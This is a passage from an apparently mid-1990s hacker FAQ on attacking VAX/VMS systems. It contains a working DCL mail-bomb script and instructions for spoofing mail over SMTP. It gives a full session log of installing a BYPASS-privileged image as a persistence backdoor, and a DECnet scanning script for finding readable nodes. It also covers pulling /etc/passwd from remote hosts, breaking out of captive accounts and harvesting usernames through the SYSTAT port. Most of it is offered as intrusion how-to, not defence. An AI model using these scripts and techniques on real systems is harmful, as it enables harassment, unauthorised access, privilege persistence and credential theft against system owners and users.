  822. CD [.sub]  [.sub] subdirectory.          CD ?        Display CD instructions.
  823.  
  824.      CD :== @SYS$LOGIN:CD.COM                 DEFINE SYS$PROMPT "ON"
  825.      To make CD available from                To have the VMS $ prompt
  826.      any directory you change to.             display the current directory.
  827.  
  828.                               By The Mentor
  829. $  goto END
  830.  
  831.  
  832.     Once uploaded,  you should add the following line you your
  833.     LOGIN.COM:
  834.  
  835. $ CD :== @DEVICE:[PATH]CD.COM  ! Replace DEVICE/PATH with user information
  836.  
  837. 7.    "Okay,  where my .profile"
  838.  
  839.     Easy.  There is none.  VMS startup routines (for personal accounts)
  840.     can be found in the user's home directory under the name 
  841.     "LOGIN.COM". 
  842.  
  843. 8.    "I can't seem to get to the DCL prompt"
  844.  
  845.     It is possible to setup "CAPTIVE" accounts under VMS.  When setup
  846.     correctly,  these can be difficult to break out of,   however, 
  847.     in alot of cases, a simple control-C while the LOGIN.COM
  848.     is executing.  Another method of keeping the LOGIN.COM 
  849.     (or any commands for that fact) is to login with the 
  850.     "/NOCOMMAND" flag.  This flag is placed after your username 
  851.     at the USERNAME prompt,  and will bypass any account startup
  852.     files/commands.    On a correctly setup captive account, 
  853.     this will bomb out.    In the even that this fails,   some
  854.     places slip up by allowing a parent to spawn off other
  855.     processes.  For example,  if the captive account puts you
  856.     into FTP,  or ALL-IN-ONE (Office automation/mail package), 
  857.     it might be able to 'SPAWN' out to DCL.   This can also 
  858.     be prevented by simply setting up process limitation
  859.     on the account.  
  860.  
  861.          -     VMS SMTP/Mail Information.    - 
  862.  
  863.  
  864. 1.    "I am attempting to send fakemail by connecting to the SMTP port,
  865. but everytime I issue the 'mail from',  it gives me a 'Mailbox syntax
  866. incorrect', or 'Bad arguments'.  I try the standard format a *always*
  867. use,  but it *still* gives me this crap!  What's the problem?"......
  868.  
  869.     Of course,  it is possible to send fake mail by connecting to
  870. the VMS machines SMTP (Simple Mail Transfer Protocol) port (25), 
  871. however,  VMS "sendmail" routines tend to be a little more picky.  For 
  872. example,  the session below would *appear* that it should work...
  873.  
  874. ------<Start Session>-------
  875.  
  876. telnet 6.6.6.6 25
  877. Type ^] (decimal 29) <CR> to return to NetBlazer
  878. Trying 6.6.6.10:25...
  879. Telnet session 0 connected to bogus.add.com
  880. 220 BOGUS.ADD.COM TGV MultiNet V3.3 Rev C SMTP service ready at Fri, 6 Jan 1995 
  881. 6:25:01 -0500 (EST)
  882. helo
  883. 250 BOGUS.ADD.COM ; Hello , pleased to meet you.
  884. mail from: bob@unknown
  885. 553 Mailbox syntax incorrect
  886. quit
  887. 221 BOGUS.ADD.COM TGV MultiNet V3.3 Rev C SMTP service complete at Fri, 6 Jan 19
  888. 95 6:25:22 -0500 (EST)
  889. Telnet session 0 closed: EOF
  890.  
  891. -------<End Session>---------
  892.  
  893.     As you can see, however,  this is not the case.  Where is problem
  894. lies is in the fact,  that alot of VMS sendmail routines require "<", and
  895. ">" around "mail from" and "rcpt to" commands,  and sometimes a address
  896. (Especially the case with Multinet SMTP,  and Pathway's Wollangong 
  897. Sendmail).   In order to get a good mailing address to "work",  try 
  898. "mail from: <bob@bogus.add.com>".   Some VMS SMTP services do not require
  899. the address,  but in most cases,  the ">" and "<" are required.  The
  900. same applys with the "rcpt to" command.  You might need to format it 
  901. the same as the "mail from".  I.E. - "rcpt to: <system>" or "rcpt to:
  902. <system@bogus.add.com>".   
  903.  
  904.  
  905.  
  906. 2.     "Can I use my favorite Unix sendmail holes on VMS sendmail?"
  907.  
  908.     Don't be silly.  No...  Digital did not believe that sendmail
  909.     bugs and holes where important enough to port (grin).  (It 
  910.     has been rumored that one sendmail hole *was* actually ported,  
  911.     but as of this time,  this has not be verified. 
  912.  
  913. 3.     "How can I code a mail bomb routine,  so that I can piss off
  914.      people really good and eat 'bandwidth'."
  915.  
  916.     Like this,  below...  
  917.  
  918. $! Simple VMS Mailbomb routine. 
  919. $! Please be someone human.   Don't do this crap.
  920. $!
  921. $ say :== write sys$output
  922. $ on error then goto err
  923. $ if p4 .eqs. "" 
  924. $ then 
  925. $ say "Mailbomb V1.0                Coded By The Beaver"
  926. $ say "1995"
  927. $ say ""
  928. $ say "Usage:"
  929. $ say "MAILBOMB [Msg Subject] [File to bomb with] [Username] [# of Times]"
  930. $ exit
  931. $ endif
  932. $ A=1
  933. $ loop:
  934. $ mail/subject='p1' 'p2' 'p3' 
  935. $ A = A + 1
  936. $ if A .eqs. p4
  937. $    then
  938. $    say "Bomb Is Complete"
  939. $    exit
  940. $    endif
  941. $ goto loop
  942. $ err:
  943. $ say "A Error has occured.  Be sure all file are present and correct"
  944. $ exit
  945.  
  946.  
  947.               -      User/Image Privilege Informations     -
  948.  
  949.  
  950. 1.    "How are user privileges setup?"
  951.  
  952.     User privleges are handled in a completely different manor
  953.         than Unix handles them.  With unix,  you have either 
  954.  
  955.     a> all priveleges (IE - "root") 
  956.     b> standard user 
  957.  
  958.     VMS is a touch different.
  959.     
  960.     For example,  let say you have a field engineer that needs
  961.     a standard user account (I.E. - be able to send/receive mail, 
  962.     do standard DCL commands.. Normal TMPMBX, NETMBX,  and
  963.     all that),  but in order to do his job,  he needs to run the
  964.     online VMS diagnostics software (which is a privileged operation)
  965.     When you add the user,  you can grant him "DIAGNOSE" privledges,
  966.     and normal user privileges,  and he will be able do regular users
  967.     commands and run diagnostics. 
  968.  
  969.     What this means is that you can grant certain privileged 
  970.     function to certain users,  rather than giving the user 
  971.     "the whole system".  
  972.  
  973.     This user we added would only have access to privileges that deal
  974.     with the diagnostic software.  For example,  he could not add
  975.     users (via "AUTHORIZE" or modify the SYSUAF.DAT).  
  976.  
  977. "Privileges restrict the user of certain system functions to processes
  978. created on the behalf of authorized users.  These restrictions protect 
  979. the integrity of the operating system code,  data,  and resources and
  980. thus,  the integrity of user services." 
  981.  
  982. "Users cannot execute an image that requires a privilege they do not 
  983. possess,  unless the image is installed as a known image with the 
  984. privilege in question or the image runs within a protected subsystem"
  985.  
  986.     Privileges can also be installed on images,  so that when that 
  987.     image is executed,  that images process get the permissions 
  988.     that it has been granted (this does not mean that the user gets
  989.     the privileges,  but rather,  just the process running this
  990.     task)
  991.  
  992.             - OpenVMS VAX Guide To System Security
  993.               (6.0 manual). 
  994.  
  995.     Below is a listing of privileges,  and a brief description.
  996.  
  997.  
  998. ACNT      -    Lets a process use the RUN (Process) command to create
  999.         Process ($CREPRC) system service to create processes
  1000.         in which accounting is disabled.  A process in which
  1001.         account is disabled is on whose resources are not logged. 
  1002.  
  1003. ALLSPOOL  -    This privlege lets user's process allocate a spooled
  1004.         device by executing the Allocate Device ($ALLOC) system
  1005.         service or by users the DCL command "ALLOCATE"
  1006.  
  1007. ALTPRI      -    Allows the user's process to 
  1008.         1.  Increase its own priority
  1009.         2.  Set the base priority of a target process
  1010.         3.  Change priority of its batch or print jobs. 
  1011.  
  1012. AUDIT      -    Allows software to append to audit records to the system
  1013.         security audit log file.   As a result,  this privilege
  1014.         permits the logging of events that appear to come from the
  1015.         operating system
  1016.  
  1017. BUGCHK      -    Allows the process to make bugcheck error log entries
  1018.         from users,  supervisor, or compatibility mode or to send
  1019.         messages to the system error logger. 
  1020.  
  1021. BYPASS      -    Allows the user's process full access to all protected
  1022.         objects,  totally bypassing UIC-based protection, 
  1023.         ACL protection (Access Control List) and mandatory 
  1024.         access controls.   Users with this privilege can 
  1025.         modify authorization records (SYSUAF.DAT,  where
  1026.         usernames/passwords are stored),  rights identifiers
  1027.         (RIGHTSLIST.DAT), DECNet object passwords and accounts
  1028.         (NETOBJECT.DAT),  and unlimited file access.
  1029.  
  1030. CMEXEC      -     Allows the user's process to execute the Change Mode to
  1031.         Executive system service.
  1032.  
  1033. CMKRNL      -    Allows the user's process to execute the Change Mode to
  1034.         Kernel system services.   These privileges allow 
  1035.         things like modify a multiprocessor operation (START/
  1036.         CPU,  STOP/CPU type commands),  modifying the system
  1037.         rights list (SET RIGHTS/ATTRIBUTE), change a processes
  1038.         UIC (SET UIC),  and other functions.
  1039.  
  1040. DETACH      -    Processes can create detached processes that have there
  1041.         own UIC without the DETACH privilege,  provided the 
  1042.         processes wants to specify a different UIC for the 
  1043.         
  1044.  
  1045. DIAGNOSE  -    Lets a process run online diagnostic programs and intercept
  1046.         and copy all messages written to the error log file. 
  1047.  
  1048. DOWNGRADE -    Permits a process to manipulate mandatory access controls.
  1049.  
  1050. EXQUOTA      -    Allows the space taken by the user's files on a given
  1051.         disk volumes to exceed any usage quotas set for the user 
  1052.         (as determined by UIC) on those volumes. 
  1053.  
  1054. GROUP      -    Allows the user's process to affect other processes in its
  1055.         own group.
  1056.  
  1057. GRPNAME   -     Lets the user's process bypass  access controls
  1058.         and insert names into (and delete from) the logical table
  1059.         of the group to which the process belongs by the use of the
  1060.         Create Logical Bane and Delete Logical Name system services.
  1061.  
  1062. GRPPRV      -     When the process's group matches the group of the object
  1063.         owner,  the GRPPRV privilege gives a process the access rights
  1064.         provided by the object's system protection field.  GRPPRV
  1065.         also lets a process change the protection or the 
  1066.         ownership of any object whose owner group matches the
  1067.         process's group by using the DCL commands SET SECURITY
  1068.  
  1069. IMPORT       -    Lets a process manipulate mandatory access controls.  The
  1070.         privilege lets a process mount unlabeled tape volumes.  
  1071.         This privilege is reserved for enhanced security products
  1072.         like SEVMS. 
  1073.  
  1074. LOG_IO       -    Lets the user's process execute the Queue I/O request
  1075.         ($QIO) system service to perform logical-level I/O
  1076.         operations.
  1077.  
  1078. MOUNT      -    Lets the user's process execute the mount volume QIO
  1079.         function. 
  1080.  
  1081. NETMBX      -    lets a process perform functions related to a DECNet
  1082.         Computer Network. 
  1083.  
  1084. OPER      -    Allows a process to use the Operator Communications 
  1085.         Manager (OPCOM) process to reply to user's request, 
  1086.         to broadcast messages to all terminals logged in,  to 
  1087.         designate terminals as operator terminals and specify
  1088.         the types of messages to be displayed to these operator's
  1089.         terminals,  and to initialize and control the log file
  1090.         of operator's messages. 
  1091.  
  1092. PFNMAP      -    Lets a user's process create and map page frame number
  1093.         (PFN) global sections to specific pages of physical 
  1094.         memory or I/O device registers,  no matter who is using
  1095.         the pages or registers. 
  1096.  
  1097. PHY_IO      -    Lets the user's process execute the Queue I/O request
  1098.         ($QUI) system service to perform physical-level I/O
  1099.         operations. 
  1100.  
  1101. PRMCEB      -    Lets the user's process create or delete a permanent
  1102.         common even flag cluster by executing the Associate 
  1103.         Common Event Flag Cluster. 
  1104.  
  1105. PRMGBL      -    Lets the user's process create or delete permanent 
  1106.         global section by executing the Create and Map Section
  1107.         or Delete Global Section system service.  In addition
  1108.         ,  a process with this privilege (plus CMKRNL and SYSGLB
  1109.         privileges) can use the Install utility (INSTALL)
  1110.  
  1111. PRMMBX      -    Lets user's process create or delete permanent mailbox
  1112.         by the Create Mailbox and Assign Channel system service
  1113.         or the DElete Mailbox system service.   Mailboxes are
  1114.         buffers in virtual memory that are treated as if they were
  1115.         record oriented I/O devices.  A mailbox is used for
  1116.         general interprocess communications. 
  1117.  
  1118. PSWAPM      -    Lets the user's process control whether is can be 
  1119.         swapped out of the balance set by executing the 
  1120.         Set Process Swap Mode system service. 
  1121.  
  1122. READALL      -    Lets the process bypass existing restrictions that would
  1123.         otherwise prevent the process from reading an object. 
  1124.         Unlike the BYPASS privilege which will permits writing and
  1125.         deleting,  READALL permits only the reading of objects
  1126.         and allow updating of such backup-related file
  1127.         characteristics as the backup date. 
  1128.  
  1129. SECURITY  -     Lets a process perform security related functions such
  1130.         as modifying the system password with the DCL command
  1131.         SET PASSWORD /SYSTEM or modifying the system alarm 
  1132.         and auditing settings using the DCL command 
  1133.         SET AUDIT.  
  1134.  
  1135. SETPRV      -    Lets user's create process whose privileges are greater
  1136.         than its own.   With this privilege,  a user can obtain
  1137.         any other privilege via the DCL command "SET PROCESS/
  1138.         PRIV"
  1139.  
  1140. SHARE      -    Lets process assign channels to devices allocated to other
  1141.         processes or to a nonshared device the Assign I/O Channel
  1142.         system service. 
  1143.  
  1144. SHMEM      -    Lets the user's process create global sections and 
  1145.         mailboxes (permanent or temporary_ in memory shared by
  1146.         multiple processors if the process also has appropriate
  1147.         PRMGBL,  PRMMBX,  SYSGBL,  and TMPMBX privileges. 
  1148.  
  1149. SYSGBL      -    Lets user;s create or delete system global sections by
  1150.         executing the Create and Map Sections or the Delete
  1151.         Global Section system services.  With this privilege
  1152.         and CMKRNL and PRMGBL,  the Install command (INSTALL)
  1153.         can be used. 
  1154.  
  1155. SYSNAM      -    Let's user's process bypass discrepancy access
  1156.         controls and insert names into the system logical
  1157.         name table and delete names from that table.  A
  1158.         process with this privilege can use the DCL commands
  1159.         ASSIGN and DEFINE to add names to the system logical
  1160.         in the user or executive mode and can use the DEASSIGN
  1161.         command in either mode to delete names from the 
  1162.         table. 
  1163.  
  1164. SYSPRV      -    Lets a process access security objects by the system
  1165.         protection field and also read and modify the owner
  1166.         (UIC),  the UIC-based protection code,  and the ACL 
  1167.         of and object.   Any processes with this privilege
  1168.         can add,  modify,  or delete entries in the system
  1169.         user authorization file (SYSUAF.DAT)
  1170.  
  1171. TMPMBX      -    Lets user's create process create a temporary mailbox
  1172.         by executing the Create Mailbox and Assign Channel. 
  1173.         
  1174. UPGRADE      -    Lets a process manipulate access controls.  This privilege
  1175.         is reserved for enhanced security products like SEVMS.
  1176.  
  1177. VOLPRO      -    Lets user's processes:
  1178.             o Initialize a previously used volume with an owner
  1179.               UIC different from the user's own UIC.
  1180.             o Override the expiration date on a tape or
  1181.               disk owned by another user. 
  1182.             o Use the ////FOREIGN qualifier to mount a Files-11
  1183.               volume owned by another user.
  1184.             o Override the owner UIC protection of volume. 
  1185.  
  1186. WORLD      -    Lets user's process affect (suspend, resume, delete, 
  1187.         set priority, wake,  etc) other processes both inside
  1188.         and outside its group.
  1189.  
  1190.  
  1191.                 - Taken Mostly From the, "OpenVMS VAX
  1192.                   System Security" (V6.0) 
  1193.  
  1194.  
  1195.  
  1196. 2.    "How can I make a SUID Shell in VMS".... 
  1197.  
  1198.     Simple...  You can't.   Privileges are handled in a much different
  1199.     method than on Unix (see "How are user privileges setup").  You
  1200.     can make a program (image) that when executed,  the process
  1201.     of that image gains the privileges that it was "installed"
  1202.     with.    For example,  if you write a program that needs read access
  1203.     to the SYSUAF.DAT you *could* make SYSUAF.DAT world readable 
  1204.     (if you are on a privileged account,  of course)  but this 
  1205.     would be very,  very unwise.    Another method would be to 
  1206.     "INSTALL" the executable image and give it READALL privileges, 
  1207.     so that when a user's processes calls your programs,  that programs
  1208.     process (the image running) gets READALL privileges.   Then that
  1209.     process would be able to read the SYSUAF.DAT,   but the user's
  1210.     process would not.  
  1211.  
  1212.     With this in mind,   it is possible to create a senerio similar
  1213.     to that of a "SUID Shell" (but without the shell).  The idea
  1214.     is to give the privileges (that you want to keep ahold of) 
  1215.     on a program that does nothing more than make a call to 
  1216.     LIB$SPAWN.   The idea is to write a program that will do nothing
  1217.     more than create another process (that drops you to DCL)
  1218.     via LIB$SPAWN,  and using the VMS "INSTALL" utility,  give it
  1219.     the privileges that you wish that process to have.  There are
  1220.     several downfalls to this.  To accomplish this,  you would
  1221.     need CMKRNL privileges yourself (your process).  So your process
  1222.     would already need certain privileges to pull this off. The idea 
  1223.     here is in the event that the user has obtained a "privileged
  1224.     account",  and wishes to remain privileged,  he/she could 
  1225.     install a image which could be called by a normal (non-privileged)
  1226.     user in which he/she could obtain the system privileges again. 
  1227.     
  1228.     Below is a sample session capture of me installing a privileged
  1229.     image.   The privilege I gave this image is "BYPASS" (Bypass
  1230.     all security features,  and the ability to modify SYSUAF.DAT
  1231.     and RIGHTSLIST.DAT)
  1232.  
  1233.  
  1234. Trying...
  1235. Connected to UpperDck
  1236. Escape character is '^]'.
  1237.  
  1238.                        Upper-Dck VMS Development System 
  1239.                              
  1240.  
  1241.  
  1242. Username: SYSTEM   ! Login to our privileged account
  1243. Password: 
  1244.         Welcome to VAX/VMS version V5.2 on node UPPERDCK
  1245.     Last interactive login on Friday,  6-JAN-1995 07:17
  1246.     Last non-interactive login on Thursday, 22-DEC-1994 15:51
  1247.  
  1248.  User= SYSTEM       Directory= [SYSMGR]       UIC=  [1,4]
  1249.         Terminal= NTY5:       6-JAN-1995 07:19:01.00
  1250.  
  1251. sysm>basic    ! I am going to use VMS BASIC,  but use anything you want
  1252.  
  1253. VAX BASIC V2.3
  1254.  
  1255.  
  1256. Ready
  1257.  
  1258. 10 external long function lib$spawn ! Call "SPAWN" library.  The idea with this
  1259.    declare long xspawn            ! program is to give us another "spawned"
  1260.    xspawn=lib$spawn()            ! process. 
  1261.  
  1262. save mytrap        ! Save this program
  1263. Ready
  1264.  
  1265. exit            ! and exit the VMS BASIC. 
  1266. sysm>basic mytrap*.*    ! Just to show our file. 
  1267.  
  1268. Directory SYS$SYSROOT:[SYSMGR]
  1269.  
  1270. MYTRAP.BAS;1        
  1271.  
  1272. Total of 1 file.
  1273. sysm>basic mytrap    ! This will compile and make our object code
  1274. sysm>dir mytrap*.*    ! To show our object code. 
  1275.  
  1276. Directory SYS$SYSROOT:[SYSMGR]
  1277.  
  1278. MYTRAP.BAS;1        MYTRAP.OBJ;1        
  1279.  
  1280. Total of 2 files.
  1281.  
  1282. sysm>link mytrap/notraceback  ! Link it, with notraceback (for priv reasons)
  1283. sysm>dir mytrap*.*          ! To show our executeable code. 
  1284.  
  1285. Directory SYS$SYSROOT:[SYSMGR]
  1286.  
  1287. MYTRAP.BAS;1        MYTRAP.EXE;1        MYTRAP.OBJ;1        
  1288.  
  1289. Total of 3 files.
  1290.  
  1291. sysm>copy mytrap.exe sys$system:  ! copy it to sys$system: [this is silly] 
  1292. sysm>install              ! Run install to setup priv's on our imagine.
  1293. INSTALL> create mytrap/priv=(bypass) ! Give "mytrap" bypass priv's
  1294. INSTALL> list mytrap/full         ! Just to show off the image priv's
  1295.  
  1296. DISK$VAXVMSRL5:<SYS6.SYSEXE>.EXE
  1297.    MYTRAP;2                       Prv 
  1298.         Entry access count         = 0
  1299.         Privileges = BYPASS 
  1300.  
  1301. INSTALL> exit             ! Get the hell out of here.
  1302. sysm>dir sys$system:mytrap.exe   ! And just to show its still there
  1303.  
  1304. Directory SYS$SYSROOT:[SYSEXE]
  1305.  
  1306. MYTRAP.EXE;2        MYTRAP.EXE;1        
  1307.  
  1308. Total of 2 files.
  1309.  
  1310. sysm>dir sys$system:mytrap.exe;2 /full ! Notice "world" protections...
  1311.  
  1312. Directory SYS$SYSROOT:[SYSEXE]
  1313.  
  1314. MYTRAP.EXE;2                  File ID:  (43314,33,0)       
  1315. Size:            4/6          Owner:    [1,4]
  1316. Created:   6-JAN-1995 07:20:26.35
  1317. Revised:   6-JAN-1995 07:20:41.54 (2)
  1318. Expires:   <None specified>
  1319. Backup:    <No backup recorded>
  1320. File organization:  Sequential
  1321. File attributes:    Allocation: 6, Extend: 0, Global buffer count: 0
  1322.                     No version limit, Contiguous best try
  1323. Record format:      Fixed length 512 byte records
  1324. Record attributes:  None
  1325. RMS attributes:     None
  1326. Journaling enabled: None
  1327. File protection:    System:RWED, Owner:RWED, Group:RE, World:
  1328. Access Cntrl List:  None
  1329.  
  1330. sysm>set file sys$system:mytrap.exe /protection=(w:re) ! because world cant
  1331. sysm>log                           ! read/execute. Logout. 
  1332.  
  1333.   SYSTEM       logged out at  6-JAN-1995 07:42:02.55
  1334. Connection closed by foreign host.
  1335.  
  1336.     [Now,  we make a new connection to the system to test our ]
  1337.     [ "MYTRAP.EXE" with the image priv's attached to it       ]
  1338.  
  1339. Trying...
  1340. Connected to UpperDck.
  1341. Escape character is '^]'.
  1342.  
  1343.                        Upper-Dck VMS Development System 
  1344.                              
  1345.  
  1346. Username: JOEBOB    ! Now, log as a normal user. 
  1347. Password: 
  1348.         Welcome to VAX/VMS version V5.2 on node UPPERDCK
  1349.     Last interactive login on Friday,  6-JAN-1995 07:14
  1350.  
  1351.  User= JOEBOB        Directory= [UPPERDCK]       UIC=  [130,163]
  1352.         Terminal= NTY6:       6-JAN-1995 07:42:12.00
  1353.  
  1354. UPDCK> show process/priv ! To prove that we have normal user priv's
  1355.  
  1356.  6-JAN-1995 07:42:27.01   User: JOEBOB           Process ID:   0000010F
  1357.                           Node: UPPERDCK         Process name: "JOEBOB"
  1358.  
  1359. Process privileges:
  1360.  TMPMBX               may create temporary mailbox
  1361.  NETMBX               may create network device
  1362.  
  1363. Process rights identifiers:
  1364.  INTERACTIVE
  1365.  LOCAL
  1366.  SYS$NODE_UPPERDCK
  1367. UPDCK> set proc/priv=bypass ! To prove I can't enabled "BYPASS" priv's
  1368. %SYSTEM-W-NOTALLPRIV, not all requested privileges authorized
  1369. UPDCK> mcr mytrap           ! Run our little "privledge provider"
  1370. UPDCK> show process/priv    ! To show our priv's after we exec. MYTRAP.EXE
  1371.                 ! note that we are spawned (see PID and Proc. Name)
  1372.  
  1373.  6-JAN-1995 07:42:46.05   User: JOEBOB           Process ID:   00000110
  1374.                           Node: UPPERDCK         Process name: "JOJBOB_1"
  1375.  
  1376. Process privileges:
  1377.  TMPMBX               may create temporary mailbox
  1378.  NETMBX               may create network device
  1379.  
  1380. Process rights identifiers:
  1381.  INTERACTIVE
  1382.  LOCAL
  1383.  SYS$NODE_UPPERDCK
  1384. UPDCK> set process/priv=bypass ! Note,  no error when we do this now. 
  1385. UPDCK> show process/priv       ! To prove that we have gained BYPASS
  1386.  
  1387.  6-JAN-1995 07:42:53.37   User: JOEBOB           Process ID:   00000110
  1388.                           Node: UPPERDCK         Process name: "JOEBOB_1"
  1389.  
  1390. Process privileges:
  1391.  TMPMBX               may create temporary mailbox
  1392.  NETMBX               may create network device
  1393.  BYPASS               bypasses UIC checking 
  1394.  
  1395.  
  1396. Process rights identifiers:
  1397.  INTERACTIVE
  1398.  LOCAL
  1399.  SYS$NODE_UPPERDCK
  1400. UPDCK> logout ! I can pretty much do anything now.... Lets stop this subprocess
  1401.   Process JOEBOB_1 logged out at  6-JAN-1995 07:42:59.01
  1402. UPDCK> logout ! logout completely
  1403.  
  1404.   JOEBOB       logged out at  6-JAN-1995 07:43:05.11
  1405. Connection closed by foreign host.
  1406.     
  1407.  
  1408.          -     Using DECNetwork's to your advantage.     -
  1409.  
  1410.  
  1411. 1.    "What is a DECNet?"
  1412.  
  1413. "DECNet is a collective name for the family of communications products
  1414. (software and hardware) that allow DIGITAL operating systems to participate
  1415. in a network.  
  1416.  
  1417. "A DECNet network links computers into flexible configurations to exchange
  1418. information,  share resources,  and perform distributed processing.  DECNet
  1419. distribution processing capabitlites also information to be originated
  1420. anywhere in the network."
  1421.  
  1422.         - VMS Version 5.0 DECnet "Guide to DECNet - VAX Networking"
  1423.  
  1424.     DECNet can support a minimum of 2 nodes and up to 64,000 nodes, 
  1425.     and can support multiple OS's along with various LAN/WAN
  1426.     (Using PSI,  and DECNet system can be supported on packet 
  1427.     switching enviroments (like Tymnet and Sprintnet)) and  
  1428.     operating environments. (VMS,   Ultrix,  RSX, and with the correct
  1429.     hardware,  IBM PC's,  VAXmate's, etc).  
  1430.  
  1431.     DECNet's allow easy access to information from system to system.
  1432.  
  1433.  
  1434. 2.    "This is great,  what does it mean to me."
  1435.  
  1436.     You can use DECNets to grab information/files/programs and use
  1437.     them to your own advantage (granted that security has not 
  1438.     been completely implemented... which is usually the case
  1439.     on a vanilla/default install)
  1440.  
  1441.     For instance,  if a intruder where to break into a system
  1442.     which supported a DECNet,  he/she might be able to access files on
  1443.     a remote system/nodes of that DECNet.  As stated,   DECNets
  1444.     can range from local machines in that area (LAN) or 
  1445.     DECNet's can stretch across the world.  
  1446.  
  1447. 3.    "How would I get to that information on a remote node?"
  1448.  
  1449.     All from DCL,  using commands like "DIRECTORY",  "COPY", 
  1450.     "TYPE",  etc.   Usually by adding in the node name at the 
  1451.     being of the command.  For example
  1452.  
  1453. $ DIR NODE::        ! Example format.
  1454.  
  1455.     or 
  1456.  
  1457. $ DIR NODE::SYS$COMMON:[SYSEXE]     ! Shows logical SYS$COMMON and the SYSEXE
  1458.                  ! Directory on the remote node. 
  1459.  
  1460.     or
  1461.  
  1462. $ COPY NODE::DISK1:[BOB]SECRET.TXT []  ! The "[]" means "wherever i am"
  1463.  
  1464.  
  1465. 4.    "What if I want to connect and use the nodes interactively?". 
  1466.  
  1467.     One of two ways.  Try to "SET HOST [NODENAME]".  If that fails, 
  1468.     try to use NCP (Network Control Program),  like this.....
  1469.  
  1470. $ MCR NCP CONNECT NODE [NODENAME]
  1471.  
  1472. 5.    "Well, Gee,  thats wonderful.  How do I find connectable nodes
  1473.     that are on the DECNet"
  1474.  
  1475.     Once again, this information can be found using the NCP    (
  1476.     or via a "SHOW NETWORK") command.   You might not get a 
  1477.     *complete* listing,  because the host you are on might not 
  1478.     know all DECNet nodes,  but it will at least get you hoping 
  1479.     around on the DECNet.  This list can be obtain via executing.....
  1480.  
  1481. $ MCP NCP SHOW KNOWN NODE
  1482.  
  1483.     This will dump a list.  You can sort though the information 
  1484.     using the NCP connect command,  and see what all sorts 
  1485.     of things you run into (Xyplex/DECServers,  Other VMS Machines, 
  1486.     SNA Gateway controls,  etc, etc).  If you are only interested
  1487.     in machine that you can get file information on,  you can 
  1488.     us the following command file to find nodes that you can
  1489.     use. 
  1490.     
  1491.  
  1492.  
  1493. $! DECNETFIND  Version 1.0
  1494. $! Coded By The Beaver
  1495. $! Jan 5th,  1995
  1496. $!
  1497. $! The intent of this code is to scan for remote,  connectable nodes that
  1498. $! the VMS host knows about (Via NCP) and build a list.  Once this list
  1499. $! has been created,  we check to see if the remote machine is indeed
  1500. $! A> VMS (Later rev. will include Ultrix/OSF(?)) 2> Can it be directly
  1501. $! accessed via the DECNet 3> Can we read file systems on the remote node. 
  1502. $! Node that are "successful" are stored away.  This prevents mucho 
  1503. $! time consuming scanning by hand.  
  1504. $!
  1505. $!
  1506. $ on error then goto err               ! In case of Boo-Boo
  1507. $ say :== write sys$output
  1508. $ if p1 .eqs. ""                ! Yes, output file helps 
  1509. $    then
  1510. $    say "DECNet VMS Node Finder Version 1.0                   1995"
  1511. $    say "Coded By The Beaver"
  1512. $    say ""
  1513. $    say "Usage:"
  1514. $    say "DECNETFIND [Outfile]"
  1515. $    exit
  1516. $    endif
  1517. $!
  1518. $ say "Building Node List Via NCP....(Working)"
  1519. $!
  1520. $ mcr ncp show known nodes to nodes.out  ! Fire up NCP and dump nodeslist
  1521. $ open/read in nodes.out         ! Open to read
  1522. $ open/write nodelist 'p1'         ! "Success" Storage area. 
  1523. $ on severe_error then continue         ! So things done die on "dir ::"'s
  1524. $!
  1525. $ loop1:
  1526. $ read/end = end in line
  1527. $     name=f$element(0,")", f$element(1, "(", line)) ! grab a nodename
  1528. $    if name .gts. "(" 
  1529. $      then     
  1530. $      say "**************************************************************"
  1531. $      say "Nodename: "+name
  1532. $      say ""
  1533. $      dir 'name'::        ! See if we can get to it via a DECNet DIR::
  1534. $      if $severity .nes "1"
  1535. $        then
  1536. $        say "Status:  Node Unreachable Via DECNet Dir::"
  1537. $        else
  1538. $        say "Status:  Found Good Node. [Logged]"
  1539. $        write nodelist name        ! Log it.
  1540. $        endif
  1541. $ endif
  1542. $ goto loop1
  1543. $ err:
  1544. $ say "Ouch.  There has been a error!"
  1545. $ end:
  1546. $ close in
  1547. $ close nodelist        ! Close up and leave,  exit stage
  1548. $ delete nodes.out;*        ! right
  1549. $ say "Complete!"
  1550. $ exit
  1551.  
  1552.  
  1553.     "That works great,  but I ran into a Unix (Ultrix) machine,  and 
  1554.      when I do a 'DIR NODENAME::' it only gives me some jerk-off's 
  1555.     directory.   Is there anyway I can grab files off the remote machine 
  1556.     (Ultrix) and directory listings?"
  1557.  
  1558.     Once again,  no problem.   Format the command like this:
  1559.  
  1560. $ DIR NODE::"/etc"    ! will give remote nodes /etc directory
  1561.  
  1562.     Or to grab the /etc/passwd file on the remote node,  try....
  1563.  
  1564. $ TYPE NODE::"/etc/passwd"   ! And open a capture buffer. 
  1565.  
  1566.  
  1567. 6.  "Can't DECNet's be protected more against this generic attack?"
  1568.  
  1569.     Sure,  by setting up proxy login access,  which forces the 
  1570.     users to supply a password when attempting to do network
  1571.     operations like above.  Proxy logins are formatted below:
  1572.  
  1573.     (This example is using the DCL COPY command)
  1574.  
  1575.     COPY remotenode"proxyaccount"::filename filename
  1576.  
  1577.     for example, 
  1578.  
  1579.     COPY ADAM"BOB FLASHER2"::SECURITY.TXT MYSECURITY.TXT
  1580.  
  1581.     (BOB - The Proxy login name,  FLASHER2 is the password)
  1582.  
  1583.     However,  in a vannila VMS (IE - Default installation), 
  1584.     proxy logins are not enabled,  so DECNet surfing can 
  1585.     prove to be very,  very useful. 
  1586.  
  1587. 7.  "Are proxy logins logged.. Can I write a routine that will
  1588.     attempt proxy accounts to break into remote machines?"
  1589.  
  1590.     You bet that proxy logins are logged.   Repeating invalid 
  1591.     attempts will inform the administrations that a "NETWORK
  1592.     BREAK IN" is in effect (via the OPCOM process). 
  1593.  
  1594.  
  1595.         -       TCP/IP Networked Machines        - 
  1596.  
  1597.  
  1598. 1.  "I have found a remote VMS machines on a TCP/IP network (I.E. 
  1599.      the internet).   I have tried to finger the remote system in
  1600.      order to start collecting usernames,   I get a 'connection
  1601.      refused'.... Now what?"
  1602.  
  1603.     Connect to the SYSTAT port (Port 11).  This will give jobs
  1604.     currently running on the system.  More than likely,  this
  1605.     port has been left open.  With this in mind,  you can 
  1606.     sort though all the jobs and grab usernames,  while excluding
  1607.     system jobs (I.E - SWAPPER,  ERRFMT,  AUDIT_SERVER, 
  1608.     JOB_CONTROL,  NETACP,  EVL,  REMACP,  SYMBIONT*,  
  1609.     XYP_SERVER,   OPCOM,  INET_SERVERS, etc....etc).  
  1610.  
